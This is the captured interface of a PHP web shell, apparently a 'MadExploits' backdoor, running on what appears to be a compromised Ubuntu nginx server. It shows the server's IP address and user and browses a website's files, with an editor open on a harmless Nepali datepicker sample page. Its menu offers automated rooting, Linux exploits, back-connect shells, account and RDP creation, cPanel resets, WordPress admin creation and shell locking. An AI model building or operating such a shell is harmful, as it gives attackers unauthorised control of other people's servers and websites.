Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sifaris /
public /
nepalidatepicker /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
.DS_Store
6
KB
-rw-rw-r--
sample.html
1.02
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sample.html
<html lang="en"> <head> <title>Nepali Datepicker</title> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta charset="utf-8" /> <!-- Nepali Datepicker CSS --> <link href="css\nepali.datepicker.v4.0.1.min.css" rel="stylesheet" type="text/css" /> </head> <body> <p> <input type="text" id="nepali-datepicker" placeholder="Select Nepali Date" /> </p> <!-- Nepali Datepicker Script --> <script src="js\nepali.datepicker.v4.0.1.min.js" type="text/javascript" ></script> <script type="text/javascript"> window.onload = function () { var mainInput = document.getElementById("nepali-datepicker"); mainInput.nepaliDatePicker(); }; </script> </body> </html>
Close